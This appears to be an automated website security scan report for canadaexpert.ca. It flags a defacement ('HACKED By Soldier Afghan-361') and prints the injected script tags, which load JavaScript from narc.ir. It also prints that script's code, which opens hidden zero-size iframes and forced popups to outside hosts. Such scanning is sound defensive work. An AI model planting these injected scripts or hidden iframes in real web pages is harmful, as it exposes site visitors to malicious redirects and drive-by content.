Scanned pages/files
Request | Server response | Status |
http://canadaexpert.ca/ | 200 OK Content-Length: 5577 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: HACKED By Soldier Afghan-361 <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <script src="http://narc.ir/mtp1376/secapps/a.js"></script><div id="jafar"></div> <HEAD> <script language="JavaScript"> msg = new Array(); //strings written in screen msg[0] = "<h2><u><div align='center'><font color='red'> HACKED By Soldier Afghan-361 </font></div></u></h2>"; msg[1] = "<h2><u><div align='center'><font color='ffffff'> </font></div></u></h2>"; msg[2] = "<div align='center'><font color='white'>.::My love Afghanistan::.</font></div>"; msg[3] = "<div align='center'> <br>یا علی<br>Fu ...[5905 bytes skipped]... | ||
http://narc.ir/mtp1376/secapps/a.js | 200 OK Content-Length: 2261 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe width="0" height="0" src="http://narc.ir/"></iframe>'); var needpopupfck = 1; var vc_cn = "__popUp"; var link = "http://narc.ir/"; if (readCookiefck(vc_cn)&&readCookiefck(vc_cn)==2) { needpopupfck = 0; }else{ needpopupfck = 1; } var Page_Popped_fck = false; var Page_Loaded_fck = false; var Page_Enter_fck; if (needpopupfck == 1) { InitPopfck(); } function InitPopfck() { Page window.open('javascript:void(0)', '_parent','toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1,resizable=1'); window.focus(); if(window.open(link,'_blank','toolbar=1,scrollbars=1,location=1,statusbar=1,menubar=1,resizable=1')){ window.focus(); IncrementCountfck(); } else { window.focus(); if (Page_Loaded_fck) initAdLayer(); else XBrowserAddHandlerPops(window, "load", "initAdLayer") } } } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://rahweb.com/ <iframe width="0" height="0" src="http://rahweb.com/"> Hidden iFrame found. size: 0x0 src: http://www.secapps.org/ <iframe width="0" height="0" src="http://www.secapps.org/"> | ||
http://canadaexpert.ca/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: canadaexpert.ca
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Jul 2014 08:00:11 GMT
Server: nginx
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: canadaexpert.ca
Referer: http://www.google.com/search?q=canadaexpert.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=canadaexpert.ca
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://canadaexpert.ca/
Result: canadaexpert.ca is not infected or malware details are not published yet.